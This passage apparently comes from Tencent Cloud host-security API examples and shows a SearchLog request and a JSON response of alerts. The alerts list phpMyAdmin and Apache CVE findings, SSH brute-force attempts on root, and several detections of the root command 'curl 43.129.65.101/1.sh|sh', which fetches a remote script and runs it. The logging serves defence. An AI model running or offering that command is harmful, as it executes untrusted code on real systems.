\"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级 Apache HTTP Server到 2.4.46 版本\\\",\\\"cve_id\\\":\\\"CVE-2020-9490\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server http2_module 拒绝服务漏洞\\\",\\\"id\\\":\\\"769\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_http2 模块,且Apache HTTP Server版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92209\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级至官方最新版本并且避免使用弱密码;\\\",\\\"cve_id\\\":\\\"CVE-2016-5734\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin授权用户远程命令执行漏洞\\\",\\\"id\\\":\\\"768\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-40/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6617\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 导出功能SQL注入漏洞\\\",\\\"id\\\":\\\"765\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/display_export.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-25/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5732\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x XSS漏洞\\\",\\\"id\\\":\\\"770\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.44及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2020-11984\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_proxy_uwsgi 缓冲区溢出漏洞\\\",\\\"id\\\":\\\"766\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_proxy_uwsgi 模块,且版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641844000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641824000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:10:03 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:10:01 +0800 CST\\\",\\\"id\\\":\\\"3141559\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641520000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641484000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 07:44:58 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.79\\\",\\\"modify_time\\\":\\\"2022-07-01 10:09:23 +0800 CST\\\",\\\"count\\\":\\\"349\\\",\\\"uuid\\\":\\\"93137e79-ae2e-4677-95ac-23a5024607b1\\\",\\\"src_ip\\\":\\\"110.40.168.164\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"上海-上海市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001999\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641464000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:07:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:07:01 +0800 CST\\\",\\\"id\\\":\\\"3141558\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641280000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:05:04 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:05:01 +0800 CST\\\",\\\"id\\\":\\\"3141557\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:04:05 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.0.49\\\",\\\"rule_name\\\":\\\"1003.恶意命令-下载&执行未知程序\\\",\\\"modify_time\\\":\\\"0001-01-01 00:00:00 +0000 UTC\\\",\\\"rule_level\\\":\\\"高危\\\",\\\"uuid\\\":\\\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\\\",\\\"platform\\\":\\\"Linux64\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bash\\\",\\\"exec_time\\\":\\\"2022-07-01 10:04:01 +0800 CST\\\",\\\"id\\\":\\\"3141556\\\",\\\"bash_cmd\\\":\\\"/bin/sh -c curl 43.129.65.101/1.sh|sh\\\",\\\"user\\\":\\\"0:0\\\",\\\"event_status\\\":\\\"create\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641160000\n }\n ],\n \"ListOver\": true,\n \"RequestId\": \"e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3\"\n }\n}",
|
3998
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SearchLog\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"20\",\n \"QueryString\": \"status: \\\"异常登录\\\" AND public_ip_addresses: (1* OR 2* OR 3* OR 4* OR 5* OR 6* OR 7* OR 8* OR 9*) AND NOT hostip: (10.128.200.* OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173) AND NOT username: ****\",\n \"StartTime\": \"1656641065449\",\n \"EndTime\": \"1656641965449\"\n}",
|
3999
|
+
"output": "{\n \"Response\": {\n \"Analysis\": false,\n \"Context\": \"content\",\n \"Count\": 17,\n \"Data\": [\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-20/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5704\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\\\",\\\"id\\\":\\\"771\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2019-0217\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\\\",\\\"id\\\":\\\"767\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-19/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5703\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin central_columns.lib.php SQL注入漏洞\\\",\\\"id\\\":\\\"772\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92512\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、升级到最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6633\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin dbase extension 远程代码执行漏洞\\\",\\\"id\\\":\\\"764\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级 Apache HTTP Server到 2.4.46 版本\\\",\\\"cve_id\\\":\\\"CVE-2020-9490\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server http2_module 拒绝服务漏洞\\\",\\\"id\\\":\\\"769\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_http2 模块,且Apache HTTP Server版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92209\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级至官方最新版本并且避免使用弱密码;\\\",\\\"cve_id\\\":\\\"CVE-2016-5734\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin授权用户远程命令执行漏洞\\\",\\\"id\\\":\\\"768\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-40/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6617\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 导出功能SQL注入漏洞\\\",\\\"id\\\":\\\"765\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/display_export.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-25/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5732\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x XSS漏洞\\\",\\\"id\\\":\\\"770\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.44及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2020-11984\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_proxy_uwsgi 缓冲区溢出漏洞\\\",\\\"id\\\":\\\"766\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_proxy_uwsgi 模块,且版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641844000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-06-30 11:01:55 +0800 CST\\\",\\\"hostip\\\":\\\"172.16.48.133\\\",\\\"modify_time\\\":\\\"2022-07-01 10:15:23 +0800 CST\\\",\\\"count\\\":\\\"3380\\\",\\\"uuid\\\":\\\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\\\",\\\"src_ip\\\":\\\"82.157.124.14\\\",\\\"src_machine_name\\\":\\\"ssh\\\",\\\"event_type\\\":\\\"暴破失败\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"cls_event_type\\\":\\\"bruteattack\\\",\\\"dst_port\\\":\\\"22\\\",\\\"location\\\":\\\"北京-北京市\\\",\\\"banned\\\":\\\"未阻断(非专业版、非旗舰版)\\\",\\\"id\\\":\\\"202226000001705\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\",\\\"username\\\":\\\"root\\\"}\",\n \"FileName\": \"file***\",\n 